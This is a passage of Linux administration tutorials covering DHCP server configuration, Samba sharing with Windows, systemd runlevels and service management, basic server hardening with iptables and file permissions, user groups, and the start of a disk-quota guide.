   # Set the default gateway to be used by
   # the PC clients
   option routers 192.168.1.1;

   # Don't forward DHCP requests from this
   # NIC interface to any other NIC interfaces
   option ip-forwarding off;

   # Set the broadcast address and subnet mask
   # to be used by the DHCP clients
   option broadcast-address 192.168.1.255;
   option subnet-mask 255.255.255.0;

   # Set the NTP server to be used by the
   # DHCP clients
   option ntp-servers 192.168.1.100;

   # Set the DNS server to be used by the
   # DHCP clients
   option domain-name-servers 192.168.1.100;

   # If you specify a WINS server for your Windows clients,
   # you need to include the following option in the dhcpd.conf file:
   option netbios-name-servers 192.168.1.100;

   # You can also assign specific IP addresses based on the clients'
   # ethernet MAC address as follows (host's name is "laser-printer"):
   host laser-printer {
      hardware ethernet 08:00:2b:4c:59:23;
      fixed-address 192.168.1.222;
   }
}

#
# List an unused interface here
#
subnet 192.168.2.0 netmask 255.255.255.0 {
}

The IP addresses will need to be changed to meet the ranges suitable to your network. There are other option statements that can be used to configure the DHCP. As you can see, some of the resources such as printers, which need fixed IP addresses, are given the specific IP address based on the NIC MAC address of the device.

For more information, you may read the relevant man pages:

# man dhcp-options

Routing with a DHCP Server

When a PC with DHCP configuration boots, it requests an IP address from the DHCP server. For this, it sends a standard DHCP request packet with a destination IP address of 255.255.255.255. A route has to be added for this 255.255.255.255 address so that the DHCP server knows on which interface it has to send the reply. This is done by adding the route information to the /etc/sysconfig/network-scripts/route-eth0 file, assuming the route is to be added to the eth0 interface:

#
# File /etc/sysconfig/network-scripts/route-eth0
#
255.255.255.255/32 dev eth0

After defining the interface for the DHCP routing, it has to be further ensured that your DHCP server listens only to that interface and to no other. For this the /etc/sysconfig/dhcpd file has to be edited and the preferred interface added to the DHCPDARGS variable. If the interface is to be eth0 following are the changes that need to be made:

# File: /etc/sysconfig/dhcpd

DHCPDARGS=eth0

Testing the DHCP

Using the netstat command along with the -au option will show the list of interfaces listening on the bootp or DHCP UDP port:

# netstat -au  | grep bootp

will result in the following:

udp     0         0 192.168.1.100:bootps         *:*

Additionally, a check on the /var/log/messages file will show the defined interfaces used from the time the dhcpd daemon was started:

Feb  24 17:22:44 Linux-64 dhcpd: Listening on LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24
Feb  24 17:22:44 Linux-64 dhcpd: Sending on  LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24

This confirms the DHCP Service has been installed with success and operating correctly.


Configuring Linux Samba (SMB) - How to Setup Samba (Linux Windows File Sharing)

Resource sharing, such as file systems and printers, in Microsoft Windows systems is accomplished using a protocol called the Server Message Block, or SMB. To work with such shared resources over a network consisting of Windows systems, an RHEL system must support SMB. The technology used for this is called Samba, and it provides integration between Windows and Linux systems. In addition, it can be used to provide folder sharing between Linux systems. There are two parts to Samba: a Samba server and a Samba client.

When an RHEL system accesses resources on a Windows system, it does so using the Samba Client. An RHEL system, by default, has the Samba Client installed.

When an RHEL system serves resources to a Windows system, it uses the package Samba Server or simply Samba. This is not installed by default and has to be exclusively set up.

Installing SAMBA on Linux Redhat/CentOS

Whether Samba is already installed on your RHEL, Fedora or CentOS setup can be tested with the following command:

$ rpm -q samba

The result could be - “package samba is not installed,” or something like “samba-3.5.4-68.el6_0.1.x86_64” showing the version of Samba present on the system.

To install Samba, you will need to become root with the following command (give the root password, when prompted):

$ su -       

Then use Yum to install the Linux Samba package:

# yum install samba

This will install the samba package and its dependency package, samba-common.

Before you begin to use or configure Samba, the Linux Firewall (iptables) has to be configured to allow Samba traffic. From the command-line, this is achieved with the use of the following command:

# firewall-cmd --enable --service=samba

Configuring Linux SAMBA

The Samba configuration described here joins an RHEL, Fedora or CentOS system to a Windows workgroup and sets up a directory on the RHEL system to act as a shared resource that can be accessed by authenticated Windows users.

To start with, you must gain root privileges with (give the root password, when prompted):

$ su -     

Edit the Samba configuration file:

# vi /etc/samba/smb.conf

The smb.conf [Global] Section

An smb.conf file is divided into several sections. The [global] section, which is the first section, has settings that apply to the entire Samba configuration. However, settings in the other sections of the configuration file may override the global settings.

To begin with, set the workgroup, which by default is set as “MYGROUP”:

workgroup = MYGROUP

Since most Windows networks are named WORKGROUP by default, the settings have to be changed as:

workgroup = workgroup

Configure the Shared Resource

In the next step, a shared resource that will be accessible from the other systems on the Windows network has to be configured. This section has to be given a name by which it will be referred to when shared. For our example, let’s assume you would like to share a directory on your Linux system located at /data/network-applications. You’ll need to entitle the entire section [NetApps], as shown below in our smb.conf file:

[NetApps]       

path = /data/network-applications

writeable = yes

browseable = yes

valid users = administrator

When a Windows user browses to the Linux server, they’ll see a network share labeled “NetApps”.

This concludes the changes to the Samba configuration file.

Create a Samba User

Any user wanting to access any Samba shared resource must be configured as a Samba User and assigned a password. This is achieved using the smbpasswd  command as a root user. Since you have defined “administrator” as the user who is entitled to access the “/data/network-applications” directory of the RHEL system, you have to add “administrator” as a Samba user.

You must gain root privileges with the following command (give the root password, when prompted):

$ su -

Add “administrator” as a Samba user:

# smbpasswd -a administrator

The system will respond with

New SMB password: <Enter password>
Retype new SMB password: <Retype password>

This will result into the following message:

Added user administrator

It will also be necessary to add the same account as a simple linux user, using the same password we used for the samba user:

# adduser administrator
# passwd administrator
Changing password for user administrator
New UNIX password: ********
Retype new UNIX password: ********
passwd: all authentication tokens updated successfully.

Now it is time to test the Samba configuration file for any errors. For this you can use the command line tool “testparm” as root:

# testparm

Load smb config files from /etc/samba/smb.conf

Rlimit_max: rlimit_max (1024) below minimum Windows limit (16384)

Processing section “[NetApps]”

Loaded services file OK.

Server role: ROLE_STANDALONE

Press enter to see a dump of your service definitions

If you would like to ensure that Windows users are automatically authenticated to your Samba share without being prompted for a username/password, all that’s needed is to add Samba users and passwords that exactly match your Windows clients’ usernames and passwords. When a Windows system accesses a Samba share, it will automatically try to log in using the same credentials as the user logged into the Windows system.

Starting Samba and NetBios Name Service on RHEL

The Samba and NetBios Nameservice or NMB services have to be enabled and then started for them to take effect:

# systemctl enable smb.service
# systemctl start smb.service
# systemctl enable nmb.service
# systemctl start nmb.service

In case the services were already running, you may have to restart them again:

# systemctl restart smb.service
# systemctl restart nmb.service

If you are not using systemctl command, you can alternatively start the Samba using a more classic way:

[root@gateway] service smb start
Starting SMB services:  [OK]

To configure your Linux system to automatically start the Samba service upon boot up, the above command will need to be inserted into the /etc/rc.local file. For more information about this, you can read our popular Linux Init Process & Different RunLevels article.

Accessing the Samba Shares From Windows                               

Now that you have configured the Samba resources and the services are running, they can be tested for sharing from a Windows system. For this, open the Windows Explorer and navigate to the Network page. Windows should show the RHEL system. If you double-click on the RHEL icon, you will be prompted for the username and password. The username to be entered now is “administrator” with the password that was assigned. 

Again, if you are logged on your Windows workstation using the same account and password as that of the Samba service (e.g Administrator), you will not be prompted for any authentication as the Windows  operating system will automatically authenticate to the RHEL Samba service using these credentials.

Accessing Windows Shares From RHEL Workstation or Server

To access Windows shares from your RHEL system, the package samba-client may have to be installed, unless it is installed by default. For this you must gain root privileges with (give the root password, when prompted):

$ su -  

Install samba-client using the following commands:

# yum install samba-client

To see any shared resource on the Windows system and to access it, you can go to Places > Network. Clicking on the Windows Network icon will open up the list of workgroups available for access.
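The same Windows shares can also be listed and mounted from the command line with the samba-client and cifs tools. A quick sketch, using a hypothetical Windows host and share name and assuming the mount point already exists:

# smbclient -L //winserver -U administrator
# mount -t cifs //winserver/Documents /mnt/winshare -o username=administrator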


Understanding The Linux Init Process & Different RunLevels

Different Linux systems can be used in many ways. This is the main idea behind operating different services at different operating levels. For example, the Graphical User Interface can only be run if the system is running the X-server; multiuser operation is only possible if the system is in a multiuser state or mode, such as having networking available. These are the higher states of the system, and sometimes you may want to operate at a lower level, say, in the single user mode or the command line mode.

Such levels are important for different operations, such as for fixing file or disk corruption problems, or for the server to operate in a run level where the X-session is not required. In such cases having services running that depend on higher levels of operation, makes no sense, since they will hamper the operation of the entire system.

Each service is assigned to start whenever its run level is reached. Therefore, when you ensure the startup process is orderly, and you change the mode of the machine, you do not need to bother about which service to manually start or stop.

The main run-levels that a system could use are:

RunLevel    Target    Notes
0    runlevel0.target, poweroff.target    Halt the system
1    runlevel1.target, rescue.target    Single user mode
2, 4    runlevel2.target, runlevel4.target, multi-user.target    User-defined/Site-specific runlevels. By default, identical to 3
3    runlevel3.target, multi-user.target    Multi-user, non-graphical. Users can usually log in via multiple consoles or via the network.
5    runlevel5.target, graphical.target    Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login (X11)
6    runlevel6.target, reboot.target    Reboot
Emergency    emergency.target    Emergency shell

The system and service manager for Linux is now “systemd”. It provides a concept of “targets”, as in the table above. Although targets serve a similar purpose as runlevels, they act somewhat differently. Each target has a name instead of a number and serves a specific purpose. Some targets may be implemented after inheriting all the services of another target and adding more services to it.

Backward compatibility exists, so switching targets using the familiar telinit RUNLEVEL command still works. On Fedora installs, runlevels 0, 1, 3, 5 and 6 have an exact mapping to specific systemd targets. However, user-defined runlevels such as 2 and 4 are not mapped that way; by default they are treated the same as runlevel 3.

To use the user-defined levels 2 and 4, new systemd targets have to be defined that use one of the existing runlevel targets as a base, together with a matching .wants directory; the services you want to enable are then symlinked into that directory, as sketched below.
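
A rough sketch of that procedure for, say, runlevel 4 is shown below; the paths assume a RedHat/Fedora layout and httpd is just an example of an extra service:

# base the new target on multi-user.target
cp /usr/lib/systemd/system/multi-user.target /etc/systemd/system/runlevel4.target
mkdir /etc/systemd/system/runlevel4.target.wants

# symlink the extra services you want into the .wants directory
ln -s /usr/lib/systemd/system/httpd.service /etc/systemd/system/runlevel4.target.wants/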

The most commonly used runlevels on a running Linux box are 3 and 5, and you can change between runlevels in several ways.

A runlevel of 5 will take you to a GUI-enabled login prompt and desktop operation. With a default installation this would normally be a GNOME or KDE environment. A runlevel of 3 boots your Linux box into terminal (non-X) mode and drops you to a terminal login prompt. Runlevels 0 and 6 are the runlevels for halting or rebooting your Linux box respectively.

Although compatible with SysV and LSB init scripts, systemd:

  • Provides aggressive parallelization capabilities.
  • Offers on-demand starting of daemons.
  • Uses socket and D-Bus activation for starting services.
  • Keeps track of processes using Linux cgroups.
  • Maintains mount and automount points.
  • Supports snapshotting and restoring of the system state.
  • Implements an elaborate transactional dependency-based service control logic.

Systemd starts up and supervises the entire operation of the system. It is based on the notion of units. These are composed of a name and a type (such as the targets shown in the table above), and there is a matching configuration file with the same name and type. For example, a unit avahi.service will have a configuration file with an identical name and will be a unit that encapsulates the Avahi daemon. There are seven different types of units, namely service, socket, device, mount, automount, target, and snapshot.

To introspect and control the state of the system and service manager under systemd, the main tool is the “systemctl” command. When booting up, systemd activates the default.target, whose job is to activate the different services and other units by considering their dependencies. The ‘systemd.unit=’ option can be passed as an argument on the kernel command line to override the unit to be activated. For example:

  • systemd.unit=rescue.target is a special target unit for setting up the base system and a rescue shell (similar to runlevel 1);
  • systemd.unit=emergency.target is very similar to passing init=/bin/sh but with the option to boot the full system from there;
  • systemd.unit=multi-user.target sets up a non-graphical multi-user system;
  • systemd.unit=graphical.target sets up a graphical login screen.
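
Appended to the kernel line in the boot loader, such an override might look like this (a sketch; the kernel image and root device are placeholders for your own):

linux /vmlinuz-3.x root=/dev/sda1 ro systemd.unit=rescue.target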

How to Enable/Disable Linux Services

Following are the commands used to enable or disable services in CentOS, Redhat Enterprise Linux and Fedora systems:

Activate a service immediately e.g postfix:

[root@gateway ~]# service postfix start
Starting postfix: [  OK  ]

To deactivate a service immediately e.g postfix:

[root@gateway ~]# service postfix stop
Shutting down postfix: [  OK  ]

To restart a service immediately e.g postfix:

[root@gateway ~]# service postfix restart
Shutting down postfix: [FAILED]
Starting postfix: [  OK  ]

You might have noticed the 'FAILED' message. This is normal behavior: the postfix service had already been stopped by the previous 'service postfix stop' command, so the restart's attempt to shut it down again naturally failed!

Determine Which Linux Services are Enabled at Boot

The first column of the output below is the name of a service that is currently enabled at boot. Review each listed service to determine whether it can be disabled.

If it is appropriate to disable a service, do so using the command:

[root@gateway ~]# chkconfig servicename off

Run the following command to obtain a list of all services programmed to run in the different Run Levels of your system:

[root@gateway ~]#  chkconfig --list | grep :on

NetworkManager  0:off   1:off   2:on    3:on    4:on    5:on    6:off
abrtd           0:off   1:off   2:off   3:on    4:off   5:on    6:off
acpid           0:off   1:off   2:on    3:on    4:on    5:on    6:off
atd             0:off   1:off   2:off   3:on    4:on    5:on    6:off
auditd          0:off   1:off   2:on    3:on    4:on    5:on    6:off
autofs          0:off   1:off   2:off   3:on    4:on    5:on    6:off
avahi-daemon    0:off   1:off   2:off   3:on    4:on    5:on    6:off
cpuspeed        0:off   1:on    2:on    3:on    4:on    5:on    6:off
crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
cups            0:off   1:off   2:on    3:on    4:on    5:on    6:off
haldaemon       0:off   1:off   2:off   3:on    4:on    5:on    6:off
httpd           0:off   1:off   2:off   3:on    4:off   5:off   6:off
ip6tables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables        0:off   1:off   2:on    3:on    4:on    5:on    6:off
irqbalance      0:off   1:off   2:off   3:on    4:on    5:on    6:off

Several of these services are required, but several others might not serve any purpose in your environment and use CPU and memory resources that would be better allocated to applications. Assuming you don't need RPC services, autofs or NFS, they can be disabled for all run levels using the following commands:

[root@gateway ~]# /sbin/chkconfig --level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig --level 0123456 nfslock off
[root@gateway ~]# /sbin/chkconfig --level 0123456 netfs off
[root@gateway ~]# /sbin/chkconfig --level 0123456 rpcgssd off
[root@gateway ~]# /sbin/chkconfig --level 0123456 rpcidmapd off
[root@gateway ~]# /sbin/chkconfig --level 0123456 autofs off

How to Change Runlevels

You can switch to runlevel 3 by running:    

[root@gateway ~]# systemctl isolate multi-user.target

(or)

[root@gateway ~]# systemctl isolate runlevel3.target

You can switch to runlevel 5 by running:    

[root@gateway ~]# systemctl isolate graphical.target

(or)

[root@gateway ~]# systemctl isolate runlevel5.target

How to Change the Default Runlevel Using Systemd

Systemd uses a symlink to point to the default runlevel (target). You have to delete the existing symlink first before you can create a new one:
 
[root@gateway ~]# rm /etc/systemd/system/default.target

Switch to runlevel 3 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target

Switch to runlevel 5 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

 And just in case you were wondering, systemd does not use the classic /etc/inittab file!

How to Change The Default Runlevel Using The Inittab File

There's the systemd way and, of course, the inittab way. In this case, runlevels are represented in the /etc/inittab text file, which is also where the default runlevel is specified.

To change the default runlevel in Fedora, edit /etc/inittab and find the line that looks like this:

id:5:initdefault:

The number 5 represents a runlevel with X enabled (GNOME/KDE mostly). If you want to change to runlevel 3, simply change this:

id:5:initdefault:

to this:

id:3:initdefault:

Save and reboot your Linux box. It will now boot into runlevel 3, a runlevel without X or a GUI. Avoid changing the default /etc/inittab runlevel value to 0 or 6.

Users having difficulty with Linux editors can also read our article on how to use Vi, the popular Linux editor: Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features.


How To Secure Your Linux Server or Workstation - Linux Best Security Practices

Below are some of the most common recommendations and methods to effectively secure a Linux server or workstation.

Boot Disk

One of the foremost requisites of a secure Linux server is a boot disk. Nowadays, this has become rather simple, as most Linux distributions ship on bootable CD/DVD/USB media. Other options are to use rescue disks such as ‘TestDisk’, ‘SystemRescueCD’, ‘Trinity Rescue Kit’ or ‘Ubuntu Rescue Remix’. These will enable you to gain access to your system if you are unable to log in, and also to recover files and partitions if your system is damaged. They can also be used to check for virus attacks and to detect rootkits.

The next requirement is patching your system. Distributions issue notices for security updates, and you can download and patch your system using these updates. RPM users can use the ‘up2date’ command, which automatically resolves dependencies, rather than the plain rpm commands, since those only report dependencies and do not help to resolve them.

Patch Your System

While RedHat/CentOS/Fedora users can patch their systems with a single command, 'yum update', Debian users can patch their systems with the ‘sudo apt-get update’ command, which will update the sources list. This should be followed by the command ‘sudo apt-get upgrade’, which will install the newest version of all packages on the machine, resolving all dependencies automatically.
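
Put together, the patch cycle on each family looks like this (the prompts are illustrative):

# RedHat/CentOS/Fedora
[root@gateway ~]# yum update

# Debian/Ubuntu
$ sudo apt-get update
$ sudo apt-get upgrade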

New vulnerabilities are being discovered all the time, and patches follow. One way to learn about new vulnerabilities is to subscribe to the mailing list of the distribution used.

Disable Unnecessary Services

Your system becomes increasingly insecure as you operate more services, since every service has its own security issues. For improving the overall system performance and for enhancing security, it is important to detect and eliminate unnecessary running services. To know which services are currently running on your system, you can use commands like:

[root@gateway~]# ps aux            


Following is an example output of the above command:

[root@gateway~]# ps aux
USER       PID   %CPU   %MEM    VSZ    RSS  TTY  STAT START   TIME COMMAND
root         1   0.0    0.1   2828    1400  ?     Ss   Feb08   0:02 /sbin/init
root         2   0.0    0.0      0       0  ?     S    Feb08   0:00 [kthreadd]
root         3   0.0    0.0      0       0  ?     S    Feb08   0:00 [migration/0]
root         4   0.0    0.0      0       0  ?     S    Feb08   0:00 [ksoftirqd/0]
root         5   0.0    0.0      0       0  ?     S    Feb08   0:00 [watchdog/0]
root         6   0.0    0.0      0       0  ?     S    Feb08   0:00 [events/0]
root         7   0.0    0.0      0       0  ?     S    Feb08   0:00 [cpuset]
root         8   0.0    0.0      0       0  ?     S    Feb08   0:00 [khelper]
root         9   0.0    0.0      0       0  ?     S    Feb08   0:00 [netns]
root        10   0.0    0.0      0       0  ?     S    Feb08   0:00 [async/mgr]
root        11   0.0    0.0      0       0  ?     S    Feb08   0:00 [pm]
root        12   0.0    0.0      0       0  ?     S    Feb08   0:00 [sync_supers]
apache   17250   0.0    0.9  37036    10224 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   25686   0.0    0.9  37168    10244 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   28290   0.0    0.9  37168    10296 ?     S    Feb08   0:00 /usr/sbin/httpd
postfix   30051  0.0    0.2  10240     2136 ?     S    23:35   0:00 pickup -l -t fifo -u
postfix   30060  0.0    0.2  10308     2280 ?     S    23:35   0:00 qmgr -l -t fifo -u
root      31645  0.1    0.3  11120     3112 ?     Ss   23:45   0:00 sshd: root@pts/1


The following command will list all start-up scripts for RunLevel 3 (Full multiuser mode):

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*     
OR
[root@gateway~]# ls -l /etc/rc3.d/S*          

Here is an example output of the above commands:

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*
lrwxrwxrwx. 1 root root 23 Jan 16 17:45 /etc/rc.d/rc3.d/S00microcode_ctl -> ../init.d/microcode_ctl
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S01sysstat -> ../init.d/sysstat
lrwxrwxrwx. 1 root root 22 Jan 16 17:44 /etc/rc.d/rc3.d/S02lvm2-monitor -> ../init.d/lvm2-monitor
lrwxrwxrwx. 1 root root 19 Jan 16 17:39 /etc/rc.d/rc3.d/S08ip6tables -> ../init.d/ip6tables
lrwxrwxrwx. 1 root root 18 Jan 16 17:38 /etc/rc.d/rc3.d/S08iptables -> ../init.d/iptables
lrwxrwxrwx. 1 root root 17 Jan 16 17:42 /etc/rc.d/rc3.d/S10network -> ../init.d/network
lrwxrwxrwx. 1 root root 16 Jan 27 01:04 /etc/rc.d/rc3.d/S11auditd -> ../init.d/auditd
lrwxrwxrwx. 1 root root 21 Jan 16 17:39 /etc/rc.d/rc3.d/S11portreserve -> ../init.d/portreserve
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S12rsyslog -> ../init.d/rsyslog
lrwxrwxrwx. 1 root root 18 Jan 16 17:45 /etc/rc.d/rc3.d/S13cpuspeed -> ../init.d/cpuspeed
lrwxrwxrwx. 1 root root 20 Jan 16 17:40 /etc/rc.d/rc3.d/S13irqbalance -> ../init.d/irqbalance
lrwxrwxrwx. 1 root root 17 Jan 16 17:38 /etc/rc.d/rc3.d/S13rpcbind -> ../init.d/rpcbind
lrwxrwxrwx. 1 root root 19 Jan 16 17:43 /etc/rc.d/rc3.d/S15mdmonitor -> ../init.d/mdmonitor
lrwxrwxrwx. 1 root root 20 Jan 16 17:38 /etc/rc.d/rc3.d/S22messagebus -> ../init.d/messagebus


To disable services, you can either stop a running service or change the configuration in a way that the service will not start on the next reboot. To stop a running service, RedHat/CentOS users can use the command -

[root@gateway~]# service service-name stop

The example below shows the command used to stop our Apache web service (httpd):
[root@gateway~]# service httpd stop
Stopping httpd: [  OK  ]

In order to stop the service from starting up at boot time, you could use -

[root@gateway~]# /sbin/chkconfig --level 2345 service-name off

Where 'service-name' is replaced by the name of the service, e.g. httpd.

You can also remove a service from the startup script by using the following commands which will remove the httpd (Apache Web server) service:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd 

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

During startup of the Linux operating system, the rc program looks in the /etc/rc.d/rc3.d directory (when configured with runlevel 3), executing any K* scripts with an option of stop. Then, all the S* scripts are started with an option of start. Scripts are started in numerical order; thus, the S08iptables script is started before the S85httpd script. This allows you to choose exactly when your script starts without having to edit files. The same rule applies to the K* scripts.

In some rare cases, services may have to be removed from /etc/xinetd.d or /etc/inetd.conf file.

Debian users can use the following commands to stop, start and restart a service -

$ sudo service httpd stop
$ sudo service httpd start   
$ sudo service httpd restart       


Host-based Firewall Protection with IPtables

Using the iptables firewall, you can limit access to your server by IP address or by host/domain name. RedHat/CentOS users have a file, /etc/sysconfig/iptables, built from the services that were ‘allowed’ during installation. The file can be edited to accept some services and block others. In case the requested service does not match any of the ACCEPT lines in the iptables file, the packet is logged and then rejected.

RedHat/CentOS/Fedora users will have to install the iptables with:

[root@gateway~]# yum install iptables

Debian users will need to install the iptables with the help of:

$ sudo apt-get install iptables

Then use the iptables command line options/switches to implement the policy. The rules of iptables usually take the form:
•    INDIVIDUAL REJECTS FIRST
•    THEN OPEN IT UP
•    BLOCK ALL

As it is a table of rules, the first matching rule takes precedence. If the first rule disallows everything, nothing that follows will matter.

In practice, a firewall script is needed which is created using the following sequence:
1) Create your script
2) Make it executable
3) Run the script

Following are the commands used for the above order:

[root@gateway~]# vim /root/firewall.sh   
[root@gateway~]# chmod 755 /root/firewall.sh   
[root@gateway~]# /root/firewall.sh             
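
A minimal /root/firewall.sh following the order described above might look like the sketch below; the blocked host and the single open port (SSH, TCP 22) are assumptions, so adjust them to your own policy:

#!/bin/bash
# start with a clean INPUT chain
iptables -F INPUT

# individual rejects first (e.g. a known troublesome host - example address)
iptables -A INPUT -s 203.0.113.50 -j DROP

# then open it up: loopback, established sessions and SSH
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT

# block all remaining inbound traffic
iptables -A INPUT -j DROP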

Updating the firewall script is simply a matter of re-editing it to make the necessary changes and running it again. Since iptables does not run as a daemon, there is nothing to stop; instead, the rules are flushed with the '-F' option:

[root@gateway~]# iptables -F INPUT
[root@gateway~]# iptables -F OUTPUT
[root@gateway~]# iptables -F FORWARD
[root@gateway~]# iptables -F POSTROUTING -t nat
[root@gateway~]# iptables -F PREROUTING -t nat

At startup/reboot, all that is needed is to execute the script so that the iptables rules are applied. The simplest way to do this is to add the script (/root/firewall.sh) to the /etc/rc.local file.

Best Practices

Apart from the above, a number of steps need to be taken to keep your Linux server safe from outside attackers. Key files should be checked for security and must be set to root for both owner and group:

/etc/fstab
/etc/passwd
/etc/shadow
/etc/group

The above should be owned by root and their permissions must be 644 (rw-r--r--), except /etc/shadow, which should have a permission of 400 (r--------).
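
As a quick way to apply the ownership and permissions described above (a sketch):

[root@gateway ~]# chown root:root /etc/fstab /etc/passwd /etc/shadow /etc/group
[root@gateway ~]# chmod 644 /etc/fstab /etc/passwd /etc/group
[root@gateway ~]# chmod 400 /etc/shadow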

You can read more on how to set permissions on your Linux files in our Linux File & Folder Permissions article

Limiting Root Access

Implement a password policy that forces users to change their login passwords, for example, every 60 to 90 days, starts warning them 7 days before expiry, and accepts only passwords that are a minimum of 14 characters in length.
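
On RedHat-based systems such a policy is commonly expressed in /etc/login.defs (for new accounts) and with the chage command (for existing users); the figures below simply mirror the example values above, and on newer systems minimum password length is typically enforced via PAM instead:

# /etc/login.defs (excerpt)
PASS_MAX_DAYS   90
PASS_MIN_LEN    14
PASS_WARN_AGE   7

# apply the aging policy to an existing user
[root@gateway ~]# chage -M 90 -W 7 chris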

Root access must be limited by using the following commands for RedHat/CentOS/Fedora -

[chris@gateway~]$ su -
Password: <enter root password>
[root@gateway ~]#

Or for RedHat/CentOS/Fedora/Debian:

[chris@gateway~]$ sudo -i
Password: <enter your user password>
[root@gateway ~]#

In the sudo case, provide the password of the user who is allowed to assume root privileges.

Only root should be able to access CRON. Cron is a system daemon used to execute desired tasks (in the background) at designated times.

A crontab is a simple text file with a list of commands meant to be run at specified times. It is edited with a command-line utility. These commands (and their run times) are then controlled by the cron daemon, which executes them in the system background. Each user has a crontab file which specifies the actions and times at which they should be executed; these jobs will run regardless of whether the user is actually logged into the system. There is also a root crontab for tasks requiring administrative privileges. This system crontab allows scheduling of systemwide tasks (such as log rotations and system database updates). You can use the man crontab command to find more information about it.
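
One common way to restrict cron to root only, assuming your cron implementation honours the allow/deny files, is:

# only users listed in cron.allow may use crontab
[root@gateway ~]# echo root > /etc/cron.allow
[root@gateway ~]# chmod 600 /etc/cron.allow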

Lastly, the use of SSH is recommended instead of Telnet for remote access. The main difference between the two is that SSH encrypts all data exchanged between the user and server, while Telnet sends all data in clear text, making it extremely easy to obtain root passwords and other sensitive information. All unused TCP/UDP ports must also be blocked using iptables.


Understanding, Administering Linux Groups and User Accounts

In a multi-user environment like Linux, every file is owned by a user and a group. There can be others as well who may be allowed to work with the file. What this means is, as a user, you have all the rights to read, write and execute a file created by you. Now, you may belong to a group, so you can give your group members the permission to either read, write (modify) and/or execute your file. In the same way, for those who do not belong to your group, and are called 'others', you may give similar permissions.

How are these permissions shown and how are they modified?

In a shell, command line or within a terminal, if you type 'ls -l', you will see something like the following:

drwxr-x--- 3 tutor firewall  4096 2010-08-21 15:52 Videos
-rwxr-xr-x 1 tutor firewall    21 2010-05-10 10:02 Doom-TNT

The last group of words on the right is the name of the file or directory. Therefore, 'Videos' is a directory, which is designated by the ’d’ at the start of the line. Since 'Doom-TNT' shows only a '-', at the start of the line, it is a file. The following series of 'rwx...' are the permissions of the file or directory. You will notice that there are three sets of 'rwx'. The first three rwx are the read, write and execute permissions for the owner 'tutor'.

Since the r, w and x are all present, it means the owner has all the permissions. The next set of 'rwx' is the permissions for the group, which in our example is 'firewall'. You will notice that the 'w' here is missing and is replaced by a '-'. This means members of the group 'firewall' have permission to read and to execute 'Doom-TNT', but cannot write to it or modify it. Permissions for 'others' are the same, so others can also read and execute the file, but not write to it or modify it. Others do not have any permissions for the directory 'Videos' and hence cannot read (enter), modify or execute 'Videos'.

You can use the 'chmod' command to change the permissions you give. The basic form of the command looks like:

chmod 'who'+/-'permissions' 'filename'

Here, the 'filename' is the file, whose permissions are being modified. You are giving the permissions to 'who', and 'who' can be u=user (meaning you), g=group, o=others, or a=all.

The 'permissions' you give can be r=read, w=write, x=execute or 'space' for no permissions. Using a '+' grants the permission, and a '-' removes it.

As an example, the command 'chmod o+r Videos' will result in:

drwxr-xr-- 3 tutor firewall  4096 2010-08-21 15:52 Videos

and now 'others' can read 'Videos'. Similarly, 'chmod o-r Videos', will set it back as it was, before the modification.

Linux file and folder permissions are covered extensively on our dedicated Linux File & Folder permissions article.

What Happens In A GUI environment?

If you are using a file manager like Nautilus, you will find a 'view' menu, which has an entry 'Visible Columns'. This opens up another window showing the visible columns that you can select to allow the file manager to show. You will find there are columns like 'Owner', 'Group' and 'Permissions'. By turning these columns ON, you can see the same information as with the 'ls -l' command.

If you want to modify the permissions of any file from Nautilus, you will have to right-click on the file with your mouse. This will open up a window through which you can access the 'properties' of the file. In the properties window, you can set or unset any of the permissions for owner, group and others.

What Are Group IDs?

Because Linux is a multi-user system, there could be several users logged in and using the system. The system needs to keep track of who is using what resources. This is primarily done by allocating identification numbers or IDs to all users and groups. To see the IDs, you may enter the command 'id', which will show you the user ID, the group ID and the IDs of the groups to which you belong.
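
For example (the output below is illustrative; your IDs and group names will differ):

$ id
uid=1000(tutor) gid=1000(tutor) groups=1000(tutor),4(adm),24(cdrom),118(admin)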

A standard Linux installation, for example Ubuntu, comes with some groups preconfigured. Some of these are:

4(adm), 20(dialout), 21(fax), 24(cdrom), 26(tape), 29(audio), 30(dip), 44(video), 46(plugdev), 104(fuse), 106(scanner), 114(netdev), 116(lpadmin), 118(admin), 125(sambashare)

The numbers are the group IDs and their names are given inside brackets. Unless you are a member of a specific group, you are not allowed to use that resource. For example, unless you belong to the group 'cdrom', you will not be allowed to access the contents of any CDs and DVDs that are mounted on the system.

In Linux, the 'root' or 'super user', also called the 'administrator', is a user who is a member of all the groups and has all permissions in all places, unless specifically changed. Users who have been granted root privileges in the 'sudoers' file can assume root status temporarily with the 'sudo' command.


Understanding Linux File System Quotas - Installation and Setup

When you are running your own web hosting, it is important to monitor how much space is being used by each user. This is not a simple task to do manually, since any one user or group could fill up the whole hard disk, preventing others from getting any space. Therefore, it is important to allot each user or group their own hard disk space, called a quota, and lock them out from using more than what is allotted.

The system administrator sets a limit or a disk quota to restrict certain aspects of the file system usage on a Linux operating system. In multi-user environments, disk quotas are very useful since a large number of users have access to the file system. They may be logging into the system directly or using their disk space remotely. They may also be accessing their files through NFS or through Samba. If several users host their websites on your web space, you need to implement the quota system.

How to Install Linux Quota

To install a quota system, for example on your Debian or RedHat Linux system, you will need two tools called ‘quota’ and ‘quotatool’. During the installation of these tools, you will be asked if you wish to send daily reminders to users who are going over their quotas.
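
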